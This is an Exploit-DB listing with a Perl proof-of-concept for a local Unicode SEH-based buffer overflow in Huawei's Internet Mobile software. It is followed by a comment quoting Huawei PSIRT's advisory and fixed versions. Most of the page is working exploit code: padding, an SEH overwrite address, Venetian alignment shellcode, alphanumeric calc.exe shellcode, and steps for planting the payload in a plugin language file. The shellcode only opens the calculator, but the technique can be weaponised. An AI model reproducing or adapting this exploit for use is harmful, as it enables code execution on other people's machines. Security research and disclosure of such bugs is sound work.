Huawei Technologies Internet Mobile Unicode SEH Exploit



EDB-ID: 21988 CVE: N/A OSVDB-ID: 87008
Author: Dark-Puzzle Published: 2012-10-15 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next 
#!/usr/bin/perl
# Souhail Hammou - Independant Security Researcher & Penetration Tester .
# Facebook : www.facebook.com/dark.puzzle.sec
# E-mail   : dark-puzzle@live.fr
# Greetings to all moroccan researchers and white hats .
####################################################################################
# Vulnerable : Etisalat , Vodafone , Meditel , Maroc Telecom , Royal KPN , Cell C , STC ...
####################################################################################

# Title : Huawei Technologies - Internet Mobile 0day Unicode SEH Based Vulnerability .
# Author : Dark-Puzzle
# Versions : All Versions Are Vulnerable , The behavior of the program when exploiting may vary from an OS to another OS .
# RISK : Critical .
# Type : Local .
######################################################
# Video : https://www.youtube.com/watch?v=pkOaPQJPQbE (Windows XP SP1 + Windows 7 )
#####################################################
#---------------------------------------------------------------------
# Use it at your own risk #
###---------------------------------------------------------------------
# Info : This exploit works only on WinXP SP1 because it is almost impossible to execute it on Win7 & WinXP SP2/SP3 cause This program has been compiled with SafeSEH enabled .
# So in other versions of Windows you will not find any valid UNICODE addresses (No SafeSEH) neither in OS modules nor in Program Modules .
# Anyway this exploit works perfectly on Windows XP SP1 .
# Here it is , the video explain the usage =) :  http://www.youtube.com/watch?v=pkOaPQJPQbE (Windows XP SP1 + Windows 7 )
###

# So first go to C:\program files\Internet Mobile\plugins\SMSUIPlugin\SMSUIPlugin_fr-fr.lang or _en-fr.lang (according to the program language)
# Then put the output of this perl program  in <item name="IDS_PLUGIN_NAME">HERE !!</item> . Save it open the program .
# Not like Win7 & WinXP SP2/SP3 this exploit requires you to click from the to menu "Operation" --> "Message texte" !! Bingo . Calc.exe Just Showed Up =) .
#                                                                               English :"Operation" --> "Text Message"

my $size = 43680;                                                        
my $junk = "A" x 146 ;
my $nseh = "\x61\x62"; # Popad + Align .
my $seh  = "\x88\xDC"; # p/p/r From OLE32.DLL ( Windows XP SP1 Only)
# The Venetian Shellcode : 
my $ven = 
"\x6e". # Align Code
"\x53". # push ebx
"\x6e". # Align Code
"\x58". # pop eax
"\x6e". # Align Code
"\x05\x17\x11". # add eax, 0x11001700
"\x6e". # Align Code
"\x2d\x16\x11". # sub eax, 0x11001600
"\x6e". # Align Code
"\x50". # push eax
"\x6e". # Align Code
"\xc3"; # ret

my $more = "D" x 108 ; # Exact Value To Make the Venetian shellcode work.

# CALC.exe Shellcode .
my $shellcode =
"PPYAIAIAIAIAQATAXAZAPA3QADAZA".
"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA".
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB".
"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K".
"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL".
"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55".
"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V".
"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB".
"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT".
"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU".
"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM".
"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC".
"QQ2LRCM0LJA"; 


my $morestuff = "D" x ( 43680 - length($junk.$nseh.$seh));
$payload = $junk.$nseh.$seh.$ven.$more.$shellcode.$morestuff;
open (myfile,'>mobile.txt');
print myfile $payload;
close(myfile);
print "Huawei Technologies Unicode SEH Based Overflow\n";
print "\x44\x69\x73\x63\x6F\x76\x65\x72\x65\x64\x20\x26\x20\x50\x6F\x43\x20\x42\x79\x20\x44\x61\x72\x6B\x2D\x50\x75\x7A\x7A\x6C\x65\n";
print "Creating Input Please Be Patient\n";
sleep 5;






Comments
Posted by dookie2000ca on Friday, Oct 19 2012 at 7:40 am
Received From Huawei:

The Huawei Security Advisory link is as below:
http://www.huaweidevice.com/worldwide/faq.do?method=getFaqInfo&questionId=7594
and the solution for this vulnerability is as below:
“Currently, workarounds are available and are listed below. Huawei has also made the version plan to resolve this vulnerability.
Temporary Fix
Users of Windows can upgrade the operation system to Windows XP sp3 directly or can download UTPS2.0 from our web site to cope with the security vulnerability.
1. Users of Windows XP sp1 can log in to the Web site of Microsoft to install the patch Windows XP sp3.
2. Users of the operation systems of higher versions will not be affected.
Software Versions and Fixes
The below affected products can deploy the workarounds mentioned above to mitigate the risks, or be upgraded to the below versions:
Product Model Back-End Version Solved Version Solved Time
E173u-1 UTPS11.302.09.06.162 UTPS21.005.22.00.162_MAC21.005.22.01.162 2012-9-26
E153u-1 UTPS11.302.09.05.162 UTPS21.005.15.06.162_MAC21.005.15.01.162 2012-9-26
The other affected products can deploy the workarounds mentioned above to mitigate the risks, and there is no new version or patch to be released.




Best Regards
Huawei PSIRT